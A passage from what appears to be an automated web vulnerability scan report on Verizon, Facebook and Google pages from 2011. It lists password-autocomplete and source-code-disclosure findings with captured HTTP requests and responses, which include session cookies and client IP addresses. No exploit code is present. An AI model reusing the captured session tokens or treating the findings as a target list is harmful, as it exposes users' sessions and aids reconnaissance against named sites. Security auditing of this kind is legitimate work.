User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=284C4BA4247C07559CC0CBDE7C05939B; webmail_ad="ad=1"; lob=webmail; WT_FPC=id=2a58c7583c8b5978c401315268334507:lv=1315268334507:ss=1315268334507; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; amlbcookie=03

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=1"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:39:25 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:39:25 GMT
Content-Length: 19468


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...
<div style="vertical-align: top; padding: 0px; margin: 0px;width: 372px; height: 499px; background-image: url('images/signin_bkgd.jpg')">
           <form name="frmLogin" id="frmLogin" method="post" action="https://auth.verizon.net/amserver/UI/Login?realm=dotnet&module=LDAP&clientId=webmail&goto=http://webmail.verizon.net/signin/LdapBind.jsp">
               <table width="322" border="0" cellpadding="0">
...[SNIP]...
<td valign="top">
                                       
                                       <input name="IDToken2" type="password" class="text" id="IDToken2" accesskey="p" tabindex="2" size="25" />
                                       
                                   </td>
...[SNIP]...

11.9. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webmail.verizonemail.net
Path:   /webmail/servlet/HttpNimletDriver

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizonemail.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:41:55 GMT
Content-type: text/html
Expires: Wed, 31 Dec 1969 18:00:00 CST
Pragma: No-cache
Cache-control: no-cache
Content-Length: 21251


<html>

<head>
   <title>Verizon E-Mail</title>
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l
gen true for "http://web.managedmail
...[SNIP]...
<table width="734" border="0" cellspacing="0" cellpadding="0">

<form name="loginForm" action="HttpNimletDriver" method="POST">
<input type="HIDDEN" name="nimlet" value="LoginNimlet" >
...[SNIP]...
<td colspan="2">
<input type="password" class="fixed" name="pwd" size="30" maxlength="50" /><br />
...[SNIP]...

11.10. http://www.connecttoverizon.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:14 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:14 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 32212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Order Verizon Phone,
...[SNIP]...
<div id="returning-users">
<form name="form1" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login"
method="post" >

<div id="username" >
...[SNIP]...
</label>
<input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
</div>
...[SNIP]...

11.11. http://www.connecttoverizon.com/loginFailed.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /loginFailed.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...
<div id="login-fields-return">
<FORM action="http://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post">
<div id="login-row">
...[SNIP]...
<br><input name="upwd" type="password" class="city" id="upwd"></div>
...[SNIP]...

11.12. http://www.connecttoverizon.com/loginFailed.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /loginFailed.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...
<div id="returning-users">
<form name="form1" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login"
method="post" >

<div id="username" >
...[SNIP]...
</label>
<input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
</div>
...[SNIP]...

11.13. http://www.connecttoverizon.com/order-now.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /order-now.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:08 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:36:08 GMT
X-Powered-By: PHP/5.2.3
Connection: close
Content-Type: text/html
Content-Length: 13969

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ConnectToVerizon
...[SNIP]...
<div id="returning-users">
<form name="form1" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login"
method="post" >

<div id="username" >
...[SNIP]...
</label>
<input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
</div>
...[SNIP]...

11.14. http://www.facebook.com/connect/prompt_feed.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/prompt_feed.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /connect/prompt_feed.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.50
Connection: close
Date: Mon, 05 Sep 2011 22:36:09 GMT
Content-Length: 12409

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/connect\/prompt_feed.php";window._EagleEyeSeed="a2xk";</s
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&amp;display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

11.15. http://www.facebook.com/dialog/feed

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/feed

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.54
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 14722

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="EcbK";</script><meta
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.16. https://www.google.com/accounts/ServiceLogin

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:nej40pZ-DDJ9AuDvMixEXuI_isIpQw:dizilfo2QNAghruN;Path=/accounts;Expires=Wed, 04-Sep-2013 22:36:17 GMT;Secure;HttpOnly
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Frame-Options: Deny
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 05 Sep 2011 22:36:17 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 11099
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

11.17. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54820
Expires: Mon, 05 Sep 2011 22:25:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:39 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: SrcClientID=smallbusiness.verizon.com; path=/; secure; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>


...[SNIP]...
<body onload="setTimeZone();javascript:ShowNone();" class="order">
<form name="frmNatBndlQualify" method="post" action="NBUNDLEQUALIFY.ASPX?CLIENT=RGA&amp;CUSTTYPE=NEW&amp;SMBBANNERID=ND%7eLECLS+3YR+1V" id="frmNatBndlQualify">
<div>
...[SNIP]...
<br />
<input class="inputform" id="Password" type="password" name="Password" />
<br />
...[SNIP]...

11.18. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54765
Expires: Mon, 05 Sep 2011 22:38:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:00 GMT
Connection: close
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>


...[SNIP]...
<body onload="setTimeZone();javascript:ShowNone();" class="order">
<form name="frmNatBndlQualify" method="post" action="NBUNDLEQUALIFY.ASPX" id="frmNatBndlQualify">
<div>
...[SNIP]...
<br />
<input class="inputform" id="Password" type="password" name="Password" />
<br />
...[SNIP]...

12. Source code disclosure
There are 15 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


12.1. http://business.verizon.net/SMBPortalWeb/resources/js/common.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/resources/js/common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /SMBPortalWeb/resources/js/common.js HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 27 Jul 2011 06:28:59 GMT
Accept-Ranges: bytes
Content-Length: 112736
Content-Type: application/javascript
Cache-Control: max-age=86400
Date: Mon, 05 Sep 2011 22:35:58 GMT
Connection: close
Vary: Accept-Encoding

var _lastActivityDate=new Date();function checkSessionActivity(){var c=new Date();var a=0;c.setTime(Math.abs((new Date()).getTime()-_lastActivityDate.getTime()));a=Math.floor(c.getTime()/(1000*60));va
...[SNIP]...
ow.movedownvar){clearTimeout(movedownvar)}}function wsMovetop(){wsStopscroll();wsCrossobj.style.top=0+"px"}function wsGetcontent_height(){wsContentheight=2880}function underconstruction(){window.open("<%=request.getContextPath()%>/construction.html","EBWin","top=20,left=250,screenX=250,screenY=250,width=760,height=480,status=no,scrollbars=no")}wsGetcontent_height();function reload(){return}function closeAllDiv(a){try{if((a=="mp
...[SNIP]...
tyle.zIndex="-1";a.style.display="none"}if(document.getElementById("searchHeaderText")!=null){document.getElementById("searchHeaderText").focus()}return false}function underconstruction(){window.open("<%=request.getContextPath()%>/construction.","EBWin","top=20,left=250,screenX=250,screenY=250,width=760,height=480,status=no,scrollbars=no")}function contentDisplay(d,c,f,a){var e;if(c!=null&&c!=""&&a=="href"){e=c}else{e=d}e=e+"&r
...[SNIP]...

12.2. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 55680
ETag: "d980-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:56 GMT
Connection: close

